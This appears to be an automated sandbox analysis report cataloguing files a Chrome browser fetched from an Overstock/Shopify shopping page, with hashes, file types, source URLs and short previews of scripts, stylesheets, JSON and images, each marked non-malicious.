                                                                                                                                                          SHA-512:D3962F9BC5A2D52AB9DE6A1E406D2E269321780176EA6FC4915DFDE0256083FCCF94F1AD26928253C924A9BF05857B8F97FA33BC2123312632A4DDC6A91D68E6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/MarketsProDisclaimer.BZXsgf5w.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressButton.Bsd7dL-E.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","assets/PayPalExpressButton.h-S8x8hC.css"])))=>i.map(i=>d[i]);.import{jm as y,a as e,T as h,pp as p,gm as g,c1 as b,pq as P,bJ as f,bK as v,_ as k,e as m,r as d,a9 as o,aT as r,bR as x,V as A,aa as C,aA as s}from"./app.CRtF78CU.js";function T({id:a,children:n}){const t=y(!1);return e(p.Provider,{value:h(()=>({id:a,completeStatusAtom:t}),[a,t]),children:[n,e(M,{})]})}function M(){const a=g(p),n=b(a.completeStatusAtom);return P(a.id,!n),null}const w=f({load:()=>v(()=>k(()=>import("./component-PayPalExpressButton.Bsd7dL-E.js"),__vite__mapDeps([0,1,2,3])))});function R(a){const n=a.fundingSource==="venmo"?"Venmo":"PayPal";return e(T,{id:n,children:e(w,{...a})})}function S({isForExpressCheckout:a=!1}){const n=m(),{merchantPolicies:t}=d(),i=a?"small":"base",c=t?.find(_=>_.handle==="subscription-policy"),l=e(o,{appearance:"subdued",size:i,children:n(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):145
                                                                                                                                                          Entropy (8bit):4.6759803175408035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:065E10FAF03426ACA592CC073F8034A3
                                                                                                                                                          SHA1:3EB135829C5EF88EA6290FFBDA1A63BE8667A0F6
                                                                                                                                                          SHA-256:30C67B37EC57B75A5BFC497829822243D306826917A198B732D723A3A590DA52
                                                                                                                                                          SHA-512:EE9931BFDD2EB67831F28EFD355293311A15E7B0742F6A382CAC333E5579F884493914ECB8BDFEAD45BDA9074AA23D3F68A0FEFF58409E68078C51F53EB6E937
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/21603950/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"21603950","rollup":{"average_rating":4.94,"rating_count":34,"review_count":34,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6740
                                                                                                                                                          Entropy (8bit):7.836002435465653
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D034C4C48174FC955FB5F5A3FE234202
                                                                                                                                                          SHA1:0DCD5D29A2B1227DE109F9D9AC0B2492B74F0F88
                                                                                                                                                          SHA-256:8E6BDA6756E9B1393ACCB386FC7DEC043D5164CB9CF6F7A78D94367DA1C6415C
                                                                                                                                                          SHA-512:ACEE00A2258B6EF71A4C30F1B1ABD75B6F7F94B769CCC7CAA60C5ABF7008AC769B3F93C6C9AC8A4DDCDDB9165B036FA70590BCE3F7BD28A8A1B98CA37BD42630
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/POLYTRENDS-Altura-Eco-friendly-All-Weather-Round-18_22-Side-Table.jpg?v=1717130281&width=320
                                                                                                                                                          Preview:RIFFL...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....x...*@.@.>9..C.!... ....k...p.S......Y..l.h..n~~R..CO.....Q......~..?i..?$........y.......~..7........]....O...^.|........i..W.......~...z..t.......W...?.}..w.O.o.o._...?.~....2..._..15.R;.. ..6yhD....6.....I.........5.......4#..]....{.d...R..K.q.wJ.Q.O.$..U.s.<g.54p.....N..k......i..^...........1.j]...z....-^B..[?.b.7..dR+.|l..k.=.....J.#^w.~A..-+YxUQ{.|.p.....LP..mc.K.7..=.U..hBz0....[.#.-.....-..3..2.`..>.I..=..N.d...e.........=.f..v......g'....d.p.D.w.u..l.z...].l.._...Q..!!.}..Y;.y..}).P.4+...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10168
                                                                                                                                                          Entropy (8bit):7.670758983652811
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:41CC481AA4BD81739419A649659D2F57
                                                                                                                                                          SHA1:11E0FE04876C3A14B989D168A9C2783D38A34525
                                                                                                                                                          SHA-256:62E971F0459AE28B4E5D62C7CB7E703FF309E3C78D97B24CAAA41B71461D27CA
                                                                                                                                                          SHA-512:9C3AEA244DFB9BDDB7D1B21F17072F1CC52A3C582B261258DA2CB80135CC469AA5D644D2E33D3F8B89D5340BFAC361D6982FC2B39AA2163CB44B80F483016EBE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..................................................................................,........................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):28730
                                                                                                                                                          Entropy (8bit):7.938035349600283
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:83751C4E6CBB170CEE33A667BD7D25E0
                                                                                                                                                          SHA1:B767296B023C9EB6E98FA23B643F071ED6A5C552
                                                                                                                                                          SHA-256:38798809DEDE41867D52988FE824B674180ECBC127A54D9FE7153EC0E605BAFA
                                                                                                                                                          SHA-512:5ECEDDA8350BEAD78E1DBFC6CC795A8E727A9A83B25A3724E2E32D9085B98A0AD9A0DB10937CEB0BBAE4EB900AAD2026DE058E26DD39DCA52B2E4F99F7B9BE3E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................X.....................................................................................................6.I]X>ze.....?.r...K$O@....AT...5
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):69
                                                                                                                                                          Entropy (8bit):4.087898688625098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2D964E8A700809EC78091E2C67F65CF9
                                                                                                                                                          SHA1:D7F3081BEE6E506DF8469C68B8F92575CA43EB74
                                                                                                                                                          SHA-256:B86851FE85765C4D90E9AF04BDD726F9F58002A0130E81F907B65DC88A25218F
                                                                                                                                                          SHA-512:F3B804985AE1DFF0D3419ED4ADF2BD72632E0DFE3BBE728FE7AF6CCC0E71EB02BF5585AB431A80CC4F42B3B054D48B19F90884737B8CF78EE89E96A5A0D8B36A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"qrCode":{"enabled":false},"mobileDownloadBanner":{"enabled":false}}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1436), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1436
                                                                                                                                                          Entropy (8bit):5.7648977284626515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:07182F1208691F335C080912D912C41D
                                                                                                                                                          SHA1:6E17494AE28FFE0BF117B52C8E62673CF71842CD
                                                                                                                                                          SHA-256:EE611C817CF050A9859010E5B06BBF8C7459EC23B888A637562644E0450658A8
                                                                                                                                                          SHA-512:28E833D7BEB1742763D6303D06F844FA8327714F37026E27173A65AC252B648BA03FD5A448D805B1E6FF840D67F3EE09DB5B372EC750B9E44260141CB822ECCC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.google.com/recaptcha/api.js?render=explicit
                                                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):44074
                                                                                                                                                          Entropy (8bit):7.9718751869329445
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:729FAFC8BAF5C5C5AD551D2E1A473660
                                                                                                                                                          SHA1:2C03FFE639B301AD977946DC65FE62B046EFBCC1
                                                                                                                                                          SHA-256:65175CBDF4B92161E4F44E5B66B33010C01CF143309660C0ADF9E58C4894F931
                                                                                                                                                          SHA-512:93C7B71210AD1071E4631FB4DB2DF998DB08F3F6894ED5178DCF351AFA075DCC10F26353CA2D68CE4B91490D2A9D13A5EF20C2AA6E04D434F003A8632CB633E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................S..G......G....y.?.w..._..W9|.d...z.6x....yu...=../....I}..-G.wt....p..+...M......vm|G..p.^.9.K.o9p....2b.............\[..+.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3835)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):228478
                                                                                                                                                          Entropy (8bit):5.544654990106755
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B9D9BE3B190EA89A2A44F8BC9B4E3F50
                                                                                                                                                          SHA1:DDE4586D8623FCCE8AB1500D0B05B705256BB9B4
                                                                                                                                                          SHA-256:8E23E5850645B104A98395EFCD7F43B63944DC06D642A86CF8D63E58F97BB33E
                                                                                                                                                          SHA-512:26421DD94F4AE9EFCFE8D02799857F5FB9A5935550197ED5E6A2A9BD891855DF376AC1D5001C1A0D2947F293E2F2FA4AB56B796F9DA98FF51D6205D73DAEF54D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-14698185","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":""
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):24200
                                                                                                                                                          Entropy (8bit):5.116595576774217
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C325F2EE2D653CD598221570021B3EDE
                                                                                                                                                          SHA1:173743BFB3A1F3C3B9C4415D89EBEF6B67AAAA48
                                                                                                                                                          SHA-256:EF03FE7CF9D877914564CC1B9F60E49C605F584648D00096C20C409D2FF96B89
                                                                                                                                                          SHA-512:FEDE7952B5D3F00969CAF63A28CA529B0A04C12C7540513A601B6296246EF174F6C39EAC108587D8F4B5F18EB3A5685108C9ABE44509411324698D071FDB914F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ui.powerreviews.com/api/m/1280018588/l/en_US/configuration?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3
                                                                                                                                                          Preview:{"louserzations":{"review_display.4.0.snapshot.rating_count_plural":"{0} Star Ratings","review_display.4.0.share_your_photo.confirmation.message":"Your photo has been submitted for approval. \nCheck back soon to see it live!","review_display.4.0.flagging.form_label":"What's the issue?","review_display.4.0.sorting.lowest_rated_label":"Lowest Rated","qa_display.4.0.search.no_results.header":"No results but.","review_display.4.0.badging.verified_reviewer_asset":"","review_display.4.0.flagging_form.email_error":"Email address is required","qa_display.4.0.button.ask_question":"Ask a Question","qa_display.4.0.search.input.placeholder":"Search for...","review_display.4.0.translation.revert_button":"Show original","review_display.4.0.common.yes":"Yes","qa_display.4.0.button.show_more":"Show more","review_display.4.0.flagging_form.button_label.flag":"Flag","review_display.4.0.common.by":"By","review_display.4.0.filtering.dropdown_v2.mobile_modal.submit_filters":"See Results","review_display.4
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (6915)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6916
                                                                                                                                                          Entropy (8bit):5.324882905340028
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3EB14B852610692457766610E76893AE
                                                                                                                                                          SHA1:4D64D95E1D028F9AD196D1B00453F5636DE4687C
                                                                                                                                                          SHA-256:D077996A6A91017BFF46C49FC528844EF6F092D98C9F6AE88F001AB90B153FE2
                                                                                                                                                          SHA-512:7EE5E4E454ABC939874354E04019EA96D28F15B2CD74EE6D179D0694E9B447E49B78EAFD420446A820E4CF01D0DA363CC5F640953FD7553D690E71258DF42928
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/VaultedPayment.Bk8Je7sI.css
                                                                                                                                                          Preview:.agRve{padding:var(--x-spacing-large-400) var(--x-spacing-large-500);border:1px var(--x-default-color-border) solid;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.FiV0Z{width:10.857142857142858em;height:5.714285714285714em;fill:none;stroke:var(--x-default-color-border)}.mpn0m{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.KOEBK{width:3.8rem;height:2.4rem;border:1px solid rgba(0,0,0,.07);border-radius:3px;background-color:var(--x-default-color-accent-contrast)}.c5gNr{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.zywAb{display:flex}.hBjla{width:3.8rem;height:2.4rem;border:1px solid rgba(0,0,0,.07);border-radius:3px;background-color:var(--x-default-color-accent-contrast)}._9Rdvy{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.cR1pi{height:2.4rem}.e3sCv{padding:var(--x-spacing-large-300);text-align:center}.hevoz{width:4.642857142857143em;fill:var(--x-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5454)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5553
                                                                                                                                                          Entropy (8bit):4.993714074723811
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7CDBE0B0B854A17A9C62285A91812AB2
                                                                                                                                                          SHA1:D112216BAE82344D6A1CDA4B14719C3CF16F6AC2
                                                                                                                                                          SHA-256:9595462E7A0D00B85295685FF6588F7E4A32D9357056DEFA40DAF5E2AB8B6BA9
                                                                                                                                                          SHA-512:0B8330DA230FEA07EAC9AB194A212259A80BC62A1F587316067E046B5D090F752D5E885890066A69EAE2C4D5D10A6DF66AA429D72BD605A129A0E1310D18D256
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/custom-css.css?v=80801450745420830931729144462
                                                                                                                                                          Preview:div#algolia-shopify-instantsearch .ais-SortBy select{-webkit-appearance:auto!important;appearance:auto!important}@media (max-width: 450px){div#algolia-shopify-instantsearch .ais-SortBy select{padding-right:0}}.grid.grid-carousel{display:flex;flex-wrap:wrap;padding:0;margin:0;list-style:none;column-gap:var(--grid-mobile-horizontal-spacing);row-gap:var(--grid-mobile-vertical-spacing)}@media (min-width: 750px){.grid{column-gap:var(--grid-desktop-horizontal-spacing);row-gap:var(--grid-desktop-vertical-spacing)}}.grid.grid-gapless{column-gap:0;row-gap:0}.grid-item{width:calc(25% - var(--grid-mobile-horizontal-spacing) * 3 / 4);max-width:calc(50% - var(--grid-mobile-horizontal-spacing) / 2);flex:none;list-style:none;padding:0}.grid-item>:last-child{margin-bottom:0}@media (min-width: 750px){.grid-item{width:calc(25% - var(--grid-desktop-horizontal-spacing) * 3 / 4);max-width:calc(50% - var(--grid-desktop-horizontal-spacing) / 2)}}@media (min-width: 750px) and (max-width: 1119px){.grid-one-thi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (336)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):458
                                                                                                                                                          Entropy (8bit):5.083093074926281
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:642173BE054799A424915838F618D190
                                                                                                                                                          SHA1:C2EB119D3CDA65072343E80FC341116931E2CED3
                                                                                                                                                          SHA-256:2792BF612B0764521F758C6C458A332BF0F42F312C8D27EBE6F8F465FC0F3B45
                                                                                                                                                          SHA-512:3C63CEFCB0FF7C97A4843BB204FA4E722C3756F9BE9717B8B00D0BC58B4B82BB35BF46ED6EE1423E0CF2C477922502B352094118A2C62CDB27AB7BCEDB2FD7AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm/strict/app/web-pixel-shopify-app-pixel@0220.js
                                                                                                                                                          Preview:shopify.extend('WebPixel::Render', function (api) {. var analytics=api.analytics,browser=api.browser,init=api.init;. var e=api._pixelInfo?api._pixelInfo.runtimeContext:null,n=api._pixelInfo?api._pixelInfo.type:null;analytics.subscribe("all_standard_events",(function(i){var l,o;l=i.name,o=i,browser.localStorage.getItem("shopify-pixel-mode").then((function(i){"debug"===i&&console.log(`[shopify-pixel][${n}][${e}] ${l}`,o)})).catch((function(){}))}));.});.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (13953)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14033
                                                                                                                                                          Entropy (8bit):5.601470180964666
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5D36171932959461CCA408DD301231DE
                                                                                                                                                          SHA1:DA69F437F2D096FA231822C859B3C9C0E5541111
                                                                                                                                                          SHA-256:A9B8A9FA53615F63F7F38CE8116CBD2FEBC43C5D68C9E1BC00AB35851D263BD3
                                                                                                                                                          SHA-512:DFA0F888773E96824A06079FCE3311898CCD77AA8951E7F0A3441D7ECAFB2E359FB2B67F74F09666A534299001EE2B827174DAF85E6E836B86C089E4B5F5DECE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[310],{30310:(s,e,t)=>{t.d(e,{c:()=>S});var r=t(60756),i=t.n(r),a=t(84960),o=t.n(a),n=t(96631),l=t.n(n),p=t(43688),c=t.n(p),d=t(760),h=t.n(d),u=t(85668),m=t(6880),f=t(75224),g=t(48812),b=t.n(g),v=t(77e3),I=["iconInputId","onClickRating","onIconKeyDown","isRequired","onMouseEnter","filledPercent","label","children","accessible"];function y(s){var e=u.useRef((0,m.i0)()),t=s.iconInputId,r=s.onClickRating,i=s.onIconKeyDown,a=s.isRequired,o=s.onMouseEnter,n=s.filledPercent,l=s.label,p=(s.children,s.accessible),c=b()(s,I);return(0,v.jsxs)("span",{children:[(0,v.jsx)("input",{id:e.current,name:t,className:"sr-only",onClick:r,onKeyDown:i,"aria-describedby":c["aria-describedby"],required:!!a||void 0,type:"radio"}),(0,v.jsxs)("label",{htmlFor:e.current,onMouseMove:o,className:"pr-interactive-star-icon",children:[(0,v.jsx)(f.Q,{size:50,filledPercent:n,accessible:p}),(0,
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (3088)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3089
                                                                                                                                                          Entropy (8bit):5.366611758291363
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:604ECA43D36B0C6FD3C03E72E23EC0DA
                                                                                                                                                          SHA1:091179EA80344796A16605C499D1537460401393
                                                                                                                                                          SHA-256:E859BA643A9330D67E7BCE6333E5A3420790F654A6F6057E4066E8DDFB90391C
                                                                                                                                                          SHA-512:A0725F3FF2A7CCD386328223EEC386310C289A05DA0581FB766692F2933CB9B18CD4236CF8EF5A6918403A86756243702A9033188AA6BFFFD28769B59E7AB002
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/vsearch-facetssearchresultswrapper.Cuju1057.js
                                                                                                                                                          Preview:import{c as k,j as s,r as u}from"./vsearch-vendor.2xH_R9Qb.js";import{c as w,U as W,T as X,g as I,M as K,a as q,u as z,D as $,R as H,b as J,F as S,N as Q,d as V,S as Y,P as Z,e as j,f as ss,h as ts,i as es,j as as,k as P,p as F,r as R}from"./vsearch-autocomplete.CGRHStzc.js";const os="_wrapper_9ao0v_1",rs="_facets_9ao0v_14",cs="_searchResults_9ao0v_64",ns="_resultsSummary_9ao0v_70",ds="_sortedByDropdown_9ao0v_75",us="_productGrid_9ao0v_80",ls="_pagination_9ao0v_86",is="_isLoading_9ao0v_91",t={wrapper:os,facets:rs,searchResults:cs,resultsSummary:ns,sortedByDropdown:ds,productGrid:us,pagination:ls,isLoading:is},v=k.bind(t),ps=()=>{const[a,l]=u.useState(!0),[c,E]=u.useState(!1),[e,_]=u.useState({facets:[],taxonomyFacets:[],products:[],resultCount:0}),g=I()=="DESKTOP"?K:q,{urlState:n,patchUrlState:x}=z(),d=e.resultCount,N=Math.min(Math.ceil(d/(j+g)),es),C=d>1,A=e.products.length>0&&!c,O=e.products.length===0&&!a&&!c,D=e.products.length===0&&a&&!c,y=+n.page||+$,L=as({totalProductsCount:d,cu
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (57671), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):57671
                                                                                                                                                          Entropy (8bit):5.406436595808325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BBBCF811D8437A575D796A4C1E5D4FAD
                                                                                                                                                          SHA1:CCE821AAE4F2B8982D9C08B308FB5306945EA68E
                                                                                                                                                          SHA-256:4D15FF2317E16CCD8CA1D3248FEA7D91130E022369BB032824A84AD9967064DF
                                                                                                                                                          SHA-512:6D0E3E9079DB4C175F0E8EC0279E9A89DF786D226685C0764AB20179D69E19CA269E8CC40646A97D31F95597654EC869472358BB72071011DF3410FC32E501C0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2240)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2344
                                                                                                                                                          Entropy (8bit):4.8979042040536065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F705CF8BF47FC5C7793BE62324B59B69
                                                                                                                                                          SHA1:4D6DE4F0F57FB6BF0FD0A1780BD1EA09FC1BDC70
                                                                                                                                                          SHA-256:F829A585F999DB20B01925DE04F899F5A54BE58D871B19AD6EBF5C124D49C8FC
                                                                                                                                                          SHA-512:BBC37E576E8BEF0E3A8966237598D20933B206EF94F90C9C24D048BB439B42068F34ACBF32705E3771006CB99C548BD38B1A96E365A9D4BEEBBBEF411A23A080
                                                                                                                                                          Malicious:false
